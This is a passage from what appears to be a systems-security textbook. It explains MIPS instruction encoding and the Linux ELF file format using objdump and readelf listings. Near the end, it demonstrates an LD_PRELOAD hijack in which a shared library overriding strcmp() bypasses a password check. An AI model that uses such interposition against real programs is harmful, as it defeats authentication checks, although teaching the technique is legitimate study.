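op = 0 and funct = 32 identify this as an addition; 16 = $s0 says the first source operand (rs) is in register 16; 17 = $s1 says the second source operand (rt) is in register 17; 8 = $t0 says the destination operand (rd) is register 8. Written in binary, the fields are:
000000 | 10000 | 10001 | 01000 | 00000 | 100000 |
---|---|---|---|---|---|
This is the machine code of the instruction above; the encoding is clearly very regular.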
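Supplement: commonly used MIPS instructions
lb/lh/lw: load a byte / halfword / word from memory into a register, e.g. lb $1, 0($2)
sb/sh/sw: store a byte / halfword / word from a register to memory, e.g. sb $1, 0($2)
add/addu: add the contents of two registers, e.g. add $1,$2,$3 ($1 = $2 + $3); the u form is the unsigned add
addi/addiu: add an immediate to the contents of a register, e.g. addi $1,$2,3 ($1 = $2 + 3); the u form is the unsigned add
sub/subu: subtract the contents of two registers
div/divu: divide the contents of two registers
mult/multu: multiply the contents of two registers
and/andi: bitwise AND of two registers, e.g. and $1,$2,$3 ($1 = $2 & $3); the i form takes an immediate
or/ori: bitwise OR
xor/xori: bitwise exclusive OR
beq/beqz/bnez/bne: conditional branches; eq = equal, z = zero, ne = not equal
j/jr/jal/jalr: j jumps directly; jr jumps to the address in a register; jal and jalr are the corresponding jump-and-link forms
lui: load a 16-bit immediate into the upper 16 bits of a register and fill the lower 16 bits with zeros
sll/srl: logical shift left / right, e.g. sll $1,$2,2
slt/slti/sltiu: set $1 to 1 if $2 is less than $3, otherwise set $1 to 0, e.g. slt $1,$2,$3
move/movz/movn: copy; movz copies if zero and movn copies if not zero, e.g. move $1,$2; movz $1,$2,$3 (copy $2 to $1 if $3 is zero)
trap: enter supervisor mode through the address vector
eret: return from an exception to user mode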
Linux ELF
An example
In section 1.5.1, C Language Basics, we followed the whole path from source code to executable file; now let's look at a more complex example.
#include<stdio.h>
int global_init_var = 10;
int global_uninit_var;
void func(int sum) {
printf("%d\n", sum);
}
void main(void) {
static int local_static_init_var = 20;
static int local_static_uninit_var;
int local_init_val = 30;
int local_uninit_var;
func(global_init_var + local_init_val +
local_static_init_var );
}
Then run the following commands to generate three files:
gcc -m32 -c elfDemo.c -o elfDemo.o
gcc -m32 elfDemo.c -o elfDemo.out
gcc -m32 -static elfDemo.c -o elfDemo_static.out
Use the ldd command to print the shared libraries each file depends on:
$ ldd elfDemo.out
linux-gate.so.1 (0xf77b1000)
libc.so.6 => /usr/lib32/libc.so.6 (0xf7597000)
/lib/ld-linux.so.2 => /usr/lib/ld-linux.so.2 (0xf77b3000)
$ ldd elfDemo_static.out
not a dynamic executable
elfDemo_static.out is statically linked.
Use the file command to check the format of each file:
$ file elfDemo.o
elfDemo.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
$ file elfDemo.out
elfDemo.out: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=50036015393a99344897cbf34099256c3793e172, not stripped
$ file elfDemo_static.out
elfDemo_static.out: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=276c839c20b4c187e4b486cf96d82a90c40f4dae, not stripped
$ file -L /usr/lib32/libc.so.6
/usr/lib32/libc.so.6: ELF 32-bit LSB shared object, Intel 80386, version 1 (GNU/Linux), dynamically linked, interpreter /usr/lib32/ld-linux.so.2, BuildID[sha1]=ee88d1b2aa81f104ab5645d407e190b244203a52, for GNU/Linux 3.2.0, not stripped
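This gives us the three types of ELF (Executable and Linkable Format) file, the Linux executable file format:
- Relocatable file
- Contains code and data that can be linked with other object files to produce an executable or a shared object file.
- elfDemo.o
- Executable file
- Contains a program that can be executed directly.
- elfDemo_static.out
- Shared object file
- Contains code and data for linking, in two contexts. In one, the link editor combines it with other relocatable and shared object files to produce a new object file. In the other, the dynamic linker combines multiple shared object files with an executable to form part of a process image.
- elfDemo.out
- libc-2.25.so
Their structure is shown in the figure:
In this simplified view of an ELF file, a "file header" comes first, followed by the code section, the data section, and the .bss section. After the source is compiled, executable statements become machine instructions and are stored in the .text section; initialized global variables and local static variables are stored in the .data section; uninitialized global variables and local static variables are placed in the .bss section.
Storing instructions and data separately has several benefits. From a security standpoint, once the program is loaded, data and instructions are mapped to two separate virtual memory regions. The data region needs to be readable and writable by the process while the instruction region only needs to be readable, so the permissions of the two regions can be set to read-write and read-only respectively, which prevents the program's instructions from being overwritten and abused.
elfDemo.o
Next we look deeper into the object file, using objdump to view its internal structure: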
$ objdump -h elfDemo.o
elfDemo.o: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
0 .group 00000008 00000000 00000000 00000034 2**2
CONTENTS, READONLY, GROUP, LINK_ONCE_DISCARD
1 .text 00000078 00000000 00000000 0000003c 2**0
CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
2 .data 00000008 00000000 00000000 000000b4 2**2
CONTENTS, ALLOC, LOAD, DATA
3 .bss 00000004 00000000 00000000 000000bc 2**2
ALLOC
4 .rodata 00000004 00000000 00000000 000000bc 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
5 .text.__x86.get_pc_thunk.ax 00000004 00000000 00000000 000000c0 2**0
CONTENTS, ALLOC, LOAD, READONLY, CODE
6 .comment 00000012 00000000 00000000 000000c4 2**0
CONTENTS, READONLY
7 .note.GNU-stack 00000000 00000000 00000000 000000d6 2**0
CONTENTS, READONLY
8 .eh_frame 0000007c 00000000 00000000 000000d8 2**2
CONTENTS, ALLOC, LOAD, RELOC, READONLY, DATA
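As the listing shows, besides the basic code, data, and BSS sections the object file contains several others. Note that the .bss section lacks the CONTENTS attribute, meaning it occupies no space in the file; .bss merely reserves room for uninitialized global variables and local static variables.
Code section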
$ objdump -x -s -d elfDemo.o
......
Sections:
Idx Name Size VMA LMA File off Algn
......
1 .text 00000078 00000000 00000000 0000003c 2**0
CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
......
Contents of section .text:
0000 5589e553 83ec04e8 fcffffff 05010000 U..S............
0010 0083ec08 ff75088d 90000000 005289c3 .....u.......R..
0020 e8fcffff ff83c410 908b5dfc c9c38d4c ..........]....L
0030 240483e4 f0ff71fc 5589e551 83ec14e8 $.....q.U..Q....
0040 fcffffff 05010000 00c745f4 1e000000 ..........E.....
0050 8b880000 00008b55 f401ca8b 80040000 .......U........
0060 0001d083 ec0c50e8 fcffffff 83c41090 ......P.........
0070 8b4dfcc9 8d61fcc3 .M...a..
......
Disassembly of section .text:
00000000 <func>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 53 push %ebx
4: 83 ec 04 sub $0x4,%esp
7: e8 fc ff ff ff call 8 <func+0x8>
8: R_386_PC32 __x86.get_pc_thunk.ax
c: 05 01 00 00 00 add $0x1,%eax
d: R_386_GOTPC _GLOBAL_OFFSET_TABLE_
11: 83 ec 08 sub $0x8,%esp
14: ff 75 08 pushl 0x8(%ebp)
17: 8d 90 00 00 00 00 lea 0x0(%eax),%edx
19: R_386_GOTOFF .rodata
1d: 52 push %edx
1e: 89 c3 mov %eax,%ebx
20: e8 fc ff ff ff call 21 <func+0x21>
21: R_386_PLT32 printf
25: 83 c4 10 add $0x10,%esp
28: 90 nop
29: 8b 5d fc mov -0x4(%ebp),%ebx
2c: c9 leave
2d: c3 ret
0000002e <main>:
2e: 8d 4c 24 04 lea 0x4(%esp),%ecx
32: 83 e4 f0 and $0xfffffff0,%esp
35: ff 71 fc pushl -0x4(%ecx)
38: 55 push %ebp
39: 89 e5 mov %esp,%ebp
3b: 51 push %ecx
3c: 83 ec 14 sub $0x14,%esp
3f: e8 fc ff ff ff call 40 <main+0x12>
40: R_386_PC32 __x86.get_pc_thunk.ax
44: 05 01 00 00 00 add $0x1,%eax
45: R_386_GOTPC _GLOBAL_OFFSET_TABLE_
49: c7 45 f4 1e 00 00 00 movl $0x1e,-0xc(%ebp)
50: 8b 88 00 00 00 00 mov 0x0(%eax),%ecx
52: R_386_GOTOFF global_init_var
56: 8b 55 f4 mov -0xc(%ebp),%edx
59: 01 ca add %ecx,%edx
5b: 8b 80 04 00 00 00 mov 0x4(%eax),%eax
5d: R_386_GOTOFF .data
61: 01 d0 add %edx,%eax
63: 83 ec 0c sub $0xc,%esp
66: 50 push %eax
67: e8 fc ff ff ff call 68 <main+0x3a>
68: R_386_PC32 func
6c: 83 c4 10 add $0x10,%esp
6f: 90 nop
70: 8b 4d fc mov -0x4(%ebp),%ecx
73: c9 leave
74: 8d 61 fc lea -0x4(%ecx),%esp
77: c3 ret
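Contents of section .text is the hexadecimal dump of .text, 0x78 bytes in total: the leftmost column is the offset, the middle 4 columns are the contents, and the rightmost column is the ASCII rendering. Disassembly of section .text below it is the disassembly.
Data section and read-only data section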
......
Sections:
Idx Name Size VMA LMA File off Algn
2 .data 00000008 00000000 00000000 000000b4 2**2
CONTENTS, ALLOC, LOAD, DATA
4 .rodata 00000004 00000000 00000000 000000bc 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
......
Contents of section .data:
0000 0a000000 14000000 ........
Contents of section .rodata:
0000 25640a00 %d..
.......
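The .data section holds initialized global variables and local static variables. elfDemo.c has two such variables, global_init_var and local_static_init_var, 4 bytes each and 8 bytes in total. Because of little-endian byte order, 0a000000 is the value of global_init_var (10), hexadecimal 0x0a, and 14000000 is the value of local_static_init_var (20), hexadecimal 0x14.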
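The .rodata section holds read-only data, including read-only variables and string constants. The printf call in elfDemo.c uses the string constant %d\n, which is read-only data stored in the .rodata section; the dump shows the ASCII form of the string constant, terminated by \0.
BSS section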
Sections:
Idx Name Size VMA LMA File off Algn
3 .bss 00000004 00000000 00000000 000000bc 2**2
ALLOC
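The .bss section holds uninitialized global variables and local static variables.
ELF file structure
Object files participate in both program linking (building a program) and program execution (running a program). The ELF structures and related information are defined in /usr/include/elf.h.
- ELF header: sits at the very start of the object file and describes the basic properties of the whole file.
- Program header table: optional; it tells the system how to create a process image. Executable files must have a program header table; relocatable files do not need one.
- Section: holds the bulk of the object file information for the linking view.
- Section header table: holds the information describing every section in the file.
32-bit data types
Name | Size | Alignment | Description | Underlying type |
---|---|---|---|---|
Elf32_Addr | 4 | 4 | Unsigned program address | uint32_t |
Elf32_Half | 2 | 2 | Unsigned short integer | uint16_t |
Elf32_Off | 4 | 4 | Unsigned file offset | uint32_t |
Elf32_Sword | 4 | 4 | Signed integer | int32_t |
Elf32_Word | 4 | 4 | Unsigned integer | uint32_t |
File header
The ELF header always sits at the start of an ELF file and identifies it as an ELF file. It is defined as follows: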
typedef struct
{
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf32_Half e_type; /* Object file type */
Elf32_Half e_machine; /* Architecture */
Elf32_Word e_version; /* Object file version */
Elf32_Addr e_entry; /* Entry point virtual address */
Elf32_Off e_phoff; /* Program header table file offset */
Elf32_Off e_shoff; /* Section header table file offset */
Elf32_Word e_flags; /* Processor-specific flags */
Elf32_Half e_ehsize; /* ELF header size in bytes */
Elf32_Half e_phentsize; /* Program header table entry size */
Elf32_Half e_phnum; /* Program header table entry count */
Elf32_Half e_shentsize; /* Section header table entry size */
Elf32_Half e_shnum; /* Section header table entry count */
Elf32_Half e_shstrndx; /* Section header string table index */
} Elf32_Ehdr;
typedef struct
{
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf64_Half e_type; /* Object file type */
Elf64_Half e_machine; /* Architecture */
Elf64_Word e_version; /* Object file version */
Elf64_Addr e_entry; /* Entry point virtual address */
Elf64_Off e_phoff; /* Program header table file offset */
Elf64_Off e_shoff; /* Section header table file offset */
Elf64_Word e_flags; /* Processor-specific flags */
Elf64_Half e_ehsize; /* ELF header size in bytes */
Elf64_Half e_phentsize; /* Program header table entry size */
Elf64_Half e_phnum; /* Program header table entry count */
Elf64_Half e_shentsize; /* Section header table entry size */
Elf64_Half e_shnum; /* Section header table entry count */
Elf64_Half e_shstrndx; /* Section header string table index */
} Elf64_Ehdr;
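e_ident holds the ELF magic number and other information. The first four bytes are the magic number, written as the string \177ELF. The next byte is ELFCLASS32 (1) for a 32-bit file or ELFCLASS64 (2) for a 64-bit file. The byte after that gives the byte order: ELFDATA2LSB (1) for little-endian, ELFDATA2MSB (2) for big-endian. The byte after that gives the ELF version.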
Now we use the readelf command to view the file header of elfDemo.out:
$ readelf -h elfDemo.out
ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x3e0
Start of program headers: 52 (bytes into file)
Start of section headers: 6288 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 9
Size of section headers: 40 (bytes)
Number of section headers: 30
Section header string table index: 29
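Program header
The program header table is located at the file offset given by e_phoff in the ELF header, and its size is determined by e_phentsize and e_phnum together: e_phentsize is the size of one program header in the table and e_phnum is the number of program headers.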
The program header is defined as follows:
typedef struct
{
Elf32_Word p_type; /* Segment type */
Elf32_Off p_offset; /* Segment file offset */
Elf32_Addr p_vaddr; /* Segment virtual address */
Elf32_Addr p_paddr; /* Segment physical address */
Elf32_Word p_filesz; /* Segment size in file */
Elf32_Word p_memsz; /* Segment size in memory */
Elf32_Word p_flags; /* Segment flags */
Elf32_Word p_align; /* Segment alignment */
} Elf32_Phdr;
typedef struct
{
Elf64_Word p_type; /* Segment type */
Elf64_Word p_flags; /* Segment flags */
Elf64_Off p_offset; /* Segment file offset */
Elf64_Addr p_vaddr; /* Segment virtual address */
Elf64_Addr p_paddr; /* Segment physical address */
Elf64_Xword p_filesz; /* Segment size in file */
Elf64_Xword p_memsz; /* Segment size in memory */
Elf64_Xword p_align; /* Segment alignment */
} Elf64_Phdr;
Use readelf to view the program headers:
$ readelf -l elfDemo.out
Elf file type is DYN (Shared object file)
Entry point 0x3e0
There are 9 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x00000034 0x00000034 0x00120 0x00120 R E 0x4
INTERP 0x000154 0x00000154 0x00000154 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x00000000 0x00000000 0x00780 0x00780 R E 0x1000
LOAD 0x000ef4 0x00001ef4 0x00001ef4 0x00130 0x0013c RW 0x1000
DYNAMIC 0x000efc 0x00001efc 0x00001efc 0x000f0 0x000f0 RW 0x4
NOTE 0x000168 0x00000168 0x00000168 0x00044 0x00044 R 0x4
GNU_EH_FRAME 0x000624 0x00000624 0x00000624 0x00044 0x00044 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x10
GNU_RELRO 0x000ef4 0x00001ef4 0x00001ef4 0x0010c 0x0010c R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame
03 .init_array .fini_array .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.ABI-tag .note.gnu.build-id
06 .eh_frame_hdr
07
08 .init_array .fini_array .dynamic .got
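The program header table shown above can also be walked programmatically. The following is a minimal sketch, assuming a 32-bit ELF image already loaded into memory with the same byte order as the host; the function name count_load_segments32 is hypothetical, and the sketch does not validate the ELF magic.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: count the PT_LOAD entries of a 32-bit ELF image
   held in memory. Returns -1 if the program header table does not fit
   inside the buffer. Assumes the file's byte order matches the host. */
int count_load_segments32(const unsigned char *image, size_t size)
{
    Elf32_Ehdr eh;

    assert(image != NULL);
    if (size < sizeof eh)
        return -1;
    memcpy(&eh, image, sizeof eh);              /* avoid unaligned access */

    if (eh.e_phentsize != sizeof(Elf32_Phdr))
        return -1;
    if (eh.e_phoff > size ||
        (size - eh.e_phoff) / sizeof(Elf32_Phdr) < eh.e_phnum)
        return -1;

    int loads = 0;
    for (size_t i = 0; i < eh.e_phnum; i++) {
        Elf32_Phdr ph;
        memcpy(&ph, image + eh.e_phoff + i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_LOAD)               /* loadable segment */
            loads++;
    }
    return loads;
}
```

For the elfDemo.out listing above, such a walk would be expected to find the two LOAD entries that readelf reports.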
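Sections
The section header table is an array of Elf32_Shdr structures, one per section, each describing one section. The e_shoff member of the ELF header gives the offset of the section header table within the file, e_shnum gives the number of section headers, and e_shentsize gives the size of each section header.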
typedef struct
{
Elf32_Word sh_name; /* Section name (string tbl index) */
Elf32_Word sh_type; /* Section type */
Elf32_Word sh_flags; /* Section flags */
Elf32_Addr sh_addr; /* Section virtual addr at execution */
Elf32_Off sh_offset; /* Section file offset */
Elf32_Word sh_size; /* Section size in bytes */
Elf32_Word sh_link; /* Link to another section */
Elf32_Word sh_info; /* Additional section information */
Elf32_Word sh_addralign; /* Section alignment */
Elf32_Word sh_entsize; /* Entry size if section holds table */
} Elf32_Shdr;
typedef struct
{
Elf64_Word sh_name; /* Section name (string tbl index) */
Elf64_Word sh_type; /* Section type */
Elf64_Xword sh_flags; /* Section flags */
Elf64_Addr sh_addr; /* Section virtual addr at execution */
Elf64_Off sh_offset; /* Section file offset */
Elf64_Xword sh_size; /* Section size in bytes */
Elf64_Word sh_link; /* Link to another section */
Elf64_Word sh_info; /* Additional section information */
Elf64_Xword sh_addralign; /* Section alignment */
Elf64_Xword sh_entsize; /* Entry size if section holds table */
} Elf64_Shdr;
Use readelf to list all sections of the object file:
$ readelf -S elfDemo.o
There are 15 section headers, starting at offset 0x41c:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .group GROUP 00000000 000034 000008 04 12 16 4
[ 2] .text PROGBITS 00000000 00003c 000078 00 AX 0 0 1
[ 3] .rel.text REL 00000000 000338 000048 08 I 12 2 4
[ 4] .data PROGBITS 00000000 0000b4 000008 00 WA 0 0 4
[ 5] .bss NOBITS 00000000 0000bc 000004 00 WA 0 0 4
[ 6] .rodata PROGBITS 00000000 0000bc 000004 00 A 0 0 1
[ 7] .text.__x86.get_p PROGBITS 00000000 0000c0 000004 00 AXG 0 0 1
[ 8] .comment PROGBITS 00000000 0000c4 000012 01 MS 0 0 1
[ 9] .note.GNU-stack PROGBITS 00000000 0000d6 000000 00 0 0 1
[10] .eh_frame PROGBITS 00000000 0000d8 00007c 00 A 0 0 4
[11] .rel.eh_frame REL 00000000 000380 000018 08 I 12 10 4
[12] .symtab SYMTAB 00000000 000154 000140 10 13 13 4
[13] .strtab STRTAB 00000000 000294 0000a2 00 0 0 1
[14] .shstrtab STRTAB 00000000 000398 000082 00 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
p (processor specific)
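Note that the first entry of the ELF section header table is reserved and has type NULL.
String tables
A string table is stored as a section and holds null-terminated character sequences. The object file uses these strings to represent symbol and section names; a string is referenced simply by its offset into the table. The first and the last byte of a string table are null bytes, which guarantees that every string has a well-defined start and end. By convention, the section named .strtab is the string table (symbol names), and the section named .shstrtab is the section header string table (section names).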
Offset | +0 | +1 | +2 | +3 | +4 | +5 | +6 | +7 | +8 | +9 |
---|---|---|---|---|---|---|---|---|---|---|
+0 | \0 | h | e | l | l | o | \0 | w | o | r |
+10 | l | d | \0 | h | e | l | l | o | w | o |
+20 | r | l | d | \0 |
Offset | String |
---|---|
0 | (empty string) |
1 | hello |
7 | world |
13 | helloworld |
18 | world |
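The offset lookup in the table above can be sketched in a few lines of C. This is an illustrative helper, not code from any library; the name strtab_get is an assumption. It returns a pointer into the table and refuses offsets that are out of range or that lead to an unterminated string.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: return the string that starts at byte offset
   `off` of a string table of `size` bytes, or NULL if the offset is
   out of range or no terminating null byte follows it. */
const char *strtab_get(const char *tab, size_t size, size_t off)
{
    assert(tab != NULL);
    if (off >= size)
        return NULL;
    if (memchr(tab + off, '\0', size - off) == NULL)
        return NULL;                 /* string runs past the table */
    return tab + off;
}
```

With the 24-byte table shown above, offset 13 yields "helloworld" and offset 18 yields "world": the two strings share the same bytes, which is why string tables can overlap suffixes.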
Both tables can be dumped with readelf:
$ readelf -x .strtab elfDemo.o
Hex dump of section '.strtab':
0x00000000 00656c66 44656d6f 2e63006c 6f63616c .elfDemo.c.local
0x00000010 5f737461 7469635f 696e6974 5f766172 _static_init_var
0x00000020 2e323139 35006c6f 63616c5f 73746174 .2195.local_stat
0x00000030 69635f75 6e696e69 745f7661 722e3231 ic_uninit_var.21
0x00000040 39360067 6c6f6261 6c5f696e 69745f76 96.global_init_v
0x00000050 61720067 6c6f6261 6c5f756e 696e6974 ar.global_uninit
0x00000060 5f766172 0066756e 63005f5f 7838362e _var.func.__x86.
0x00000070 6765745f 70635f74 68756e6b 2e617800 get_pc_thunk.ax.
0x00000080 5f474c4f 42414c5f 4f464653 45545f54 _GLOBAL_OFFSET_T
0x00000090 41424c45 5f007072 696e7466 006d6169 ABLE_.printf.mai
0x000000a0 6e00
$ readelf -x .shstrtab elfDemo.o
Hex dump of section '.shstrtab':
0x00000000 002e7379 6d746162 002e7374 72746162 ..symtab..strtab
0x00000010 002e7368 73747274 6162002e 72656c2e ..shstrtab..rel.
0x00000020 74657874 002e6461 7461002e 62737300 text..data..bss.
0x00000030 2e726f64 61746100 2e746578 742e5f5f .rodata..text.__
0x00000040 7838362e 6765745f 70635f74 68756e6b x86.get_pc_thunk
0x00000050 2e617800 2e636f6d 6d656e74 002e6e6f .ax..comment..no
0x00000060 74652e47 4e552d73 7461636b 002e7265 te.GNU-stack..re
0x00000070 6c2e6568 5f667261 6d65002e 67726f75 l.eh_frame..grou
0x00000080 7000
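Symbol table
An object file's symbol table holds the information needed to locate and relocate a program's symbolic definitions and references. A symbol table index is a subscript into this array. Index 0 designates the first entry in the table and also serves as the undefined symbol index.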
typedef struct
{
Elf32_Word st_name; /* Symbol name (string tbl index) */
Elf32_Addr st_value; /* Symbol value */
Elf32_Word st_size; /* Symbol size */
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* Symbol visibility */
Elf32_Section st_shndx; /* Section index */
} Elf32_Sym;
typedef struct
{
Elf64_Word st_name; /* Symbol name (string tbl index) */
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* Symbol visibility */
Elf64_Section st_shndx; /* Section index */
Elf64_Addr st_value; /* Symbol value */
Elf64_Xword st_size; /* Symbol size */
} Elf64_Sym;
View the symbol table:
$ readelf -s elfDemo.o
Symbol table '.symtab' contains 20 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 00000000 0 FILE LOCAL DEFAULT ABS elfDemo.c
2: 00000000 0 SECTION LOCAL DEFAULT 2
3: 00000000 0 SECTION LOCAL DEFAULT 4
4: 00000000 0 SECTION LOCAL DEFAULT 5
5: 00000000 0 SECTION LOCAL DEFAULT 6
6: 00000004 4 OBJECT LOCAL DEFAULT 4 local_static_init_var.219
7: 00000000 4 OBJECT LOCAL DEFAULT 5 local_static_uninit_var.2
8: 00000000 0 SECTION LOCAL DEFAULT 7
9: 00000000 0 SECTION LOCAL DEFAULT 9
10: 00000000 0 SECTION LOCAL DEFAULT 10
11: 00000000 0 SECTION LOCAL DEFAULT 8
12: 00000000 0 SECTION LOCAL DEFAULT 1
13: 00000000 4 OBJECT GLOBAL DEFAULT 4 global_init_var
14: 00000004 4 OBJECT GLOBAL DEFAULT COM global_uninit_var
15: 00000000 46 FUNC GLOBAL DEFAULT 2 func
16: 00000000 0 FUNC GLOBAL HIDDEN 7 __x86.get_pc_thunk.ax
17: 00000000 0 NOTYPE GLOBAL DEFAULT UND _GLOBAL_OFFSET_TABLE_
18: 00000000 0 NOTYPE GLOBAL DEFAULT UND printf
19: 0000002e 74 FUNC GLOBAL DEFAULT 2 main
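The Type and Bind columns printed by readelf are both packed into the single st_info byte. The sketch below, which assumes the macros from the system header elf.h, unpacks that byte; the function name describe_st_info is hypothetical and only a handful of common values are named.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>

/* Hypothetical helper: split st_info into the binding (high 4 bits)
   and the type (low 4 bits) and map them to the names readelf prints. */
void describe_st_info(unsigned char st_info,
                      const char **bind, const char **type)
{
    assert(bind != NULL && type != NULL);

    switch (ELF32_ST_BIND(st_info)) {      /* st_info >> 4 */
    case STB_LOCAL:  *bind = "LOCAL";  break;
    case STB_GLOBAL: *bind = "GLOBAL"; break;
    case STB_WEAK:   *bind = "WEAK";   break;
    default:         *bind = "OTHER";  break;
    }

    switch (ELF32_ST_TYPE(st_info)) {      /* st_info & 0xf */
    case STT_NOTYPE:  *type = "NOTYPE";  break;
    case STT_OBJECT:  *type = "OBJECT";  break;
    case STT_FUNC:    *type = "FUNC";    break;
    case STT_SECTION: *type = "SECTION"; break;
    case STT_FILE:    *type = "FILE";    break;
    default:          *type = "OTHER";   break;
    }
}
```

For example, an st_info value of 0x12 decodes to binding GLOBAL and type FUNC, which is what the listing shows for func and main.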
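Relocation
Relocation is the process of connecting symbolic references with symbolic definitions. Relocatable files must contain information that describes how to modify their section contents, which allows executable and shared object files to hold the right information for a process's program image.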
typedef struct
{
Elf32_Addr r_offset; /* Address */
Elf32_Word r_info; /* Relocation type and symbol index */
} Elf32_Rel;
typedef struct
{
Elf64_Addr r_offset; /* Address */
Elf64_Xword r_info; /* Relocation type and symbol index */
Elf64_Sxword r_addend; /* Addend */
} Elf64_Rela;
View the relocation tables:
$ readelf -r elfDemo.o
Relocation section '.rel.text' at offset 0x338 contains 9 entries:
Offset Info Type Sym.Value Sym. Name
00000008 00001002 R_386_PC32 00000000 __x86.get_pc_thunk.ax
0000000d 0000110a R_386_GOTPC 00000000 _GLOBAL_OFFSET_TABLE_
00000019 00000509 R_386_GOTOFF 00000000 .rodata
00000021 00001204 R_386_PLT32 00000000 printf
00000040 00001002 R_386_PC32 00000000 __x86.get_pc_thunk.ax
00000045 0000110a R_386_GOTPC 00000000 _GLOBAL_OFFSET_TABLE_
00000052 00000d09 R_386_GOTOFF 00000000 global_init_var
0000005d 00000309 R_386_GOTOFF 00000000 .data
00000068 00000f02 R_386_PC32 00000000 func
Relocation section '.rel.eh_frame' at offset 0x380 contains 3 entries:
Offset Info Type Sym.Value Sym. Name
00000020 00000202 R_386_PC32 00000000 .text
00000044 00000202 R_386_PC32 00000000 .text
00000070 00000802 R_386_PC32 00000000 .text.__x86.get_pc_thu
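The Info column in the listing above packs two fields into r_info: for 32-bit ELF the upper 24 bits are the symbol table index and the low 8 bits are the relocation type. A small sketch using the elf.h macros follows; the struct and function names are assumptions made for illustration.

```c
#include <assert.h>
#include <elf.h>
#include <stdint.h>

/* Hypothetical container for the two fields packed into r_info. */
struct rel_info {
    uint32_t sym;   /* index into the symbol table */
    uint32_t type;  /* relocation type, e.g. R_386_PC32 */
};

/* Decode a 32-bit r_info value into symbol index and relocation type. */
struct rel_info decode_rel32(uint32_t r_info)
{
    struct rel_info out;
    out.sym  = ELF32_R_SYM(r_info);    /* r_info >> 8   */
    out.type = ELF32_R_TYPE(r_info);   /* r_info & 0xff */
    /* Round-trip sanity check: repacking must give the original value. */
    assert(ELF32_R_INFO(out.sym, out.type) == r_info);
    return out;
}
```

Applied to the entry 00001204, this gives symbol index 18 and type R_386_PLT32; entry 18 of the symbol table above is printf, matching the Sym. Name column.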
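Dynamic linking
Environment variables related to dynamic linking
LD_PRELOAD
The LD_PRELOAD environment variable names shared libraries that are loaded before any others when a program starts. This lets us choose which library supplies a function that several libraries define: by setting the variable, another library is interposed between the main program and its regular shared libraries and can even override functions of the original libraries. This opens the door to hijacking the program's execution.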
#include <stdio.h>
#include <string.h>
int main(void) {
    char passwd[] = "password";
    char str[128];
    /* %127s bounds the read so that str cannot overflow */
    if (scanf("%127s", str) != 1) {
        return 1;
    }
    if (!strcmp(passwd, str)) {
        printf("correct\n");
        return 0;
    }
    printf("invalid\n");
    return 0;
}
Next we write a malicious shared library that overrides strcmp(), compile it as a shared object, and set the LD_PRELOAD environment variable:
$ cat hack.c
#include <stdio.h>
int strcmp(const char *s1, const char *s2) {
printf("hacked\n");
return 0;
}
$ gcc -shared -o hack.so hack.c
$ gcc ldpreload.c
$ ./a.out
asdf
invalid
$ LD_PRELOAD="./hack.so" ./a.out
asdf
hacked
correct
LD_SHOW_AUXV
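AUXV (the auxiliary vector) is information that the kernel passes to user space when it executes an ELF file. Setting this environment variable prints it. For example: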
$ LD_SHOW_AUXV=1 ls
AT_SYSINFO_EHDR: 0x7fff41fbc000
AT_HWCAP: bfebfbff
AT_PAGESZ: 4096
AT_CLKTCK: 100
AT_PHDR: 0x55f1f623e040
AT_PHENT: 56
AT_PHNUM: 9
AT_BASE: 0x7f277e1ec000
AT_FLAGS: 0x0
AT_ENTRY: 0x55f1f6243060
AT_UID: 1000
AT_EUID: 1000
AT_GID: 1000
AT_EGID: 1000
AT_SECURE: 0
AT_RANDOM: 0x7fff41effbb9
AT_EXECFN: /usr/bin/ls
AT_PLATFORM: x86_64
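A program can also read individual auxiliary vector entries itself. The sketch below assumes a Linux system whose C library provides getauxval() in sys/auxv.h (glibc does since 2.16); the wrapper name auxv_page_size is hypothetical.

```c
#include <assert.h>
#include <elf.h>
#include <sys/auxv.h>
#include <unistd.h>

/* Hypothetical wrapper: read the AT_PAGESZ entry of the auxiliary
   vector, i.e. the value printed as "AT_PAGESZ" by LD_SHOW_AUXV=1. */
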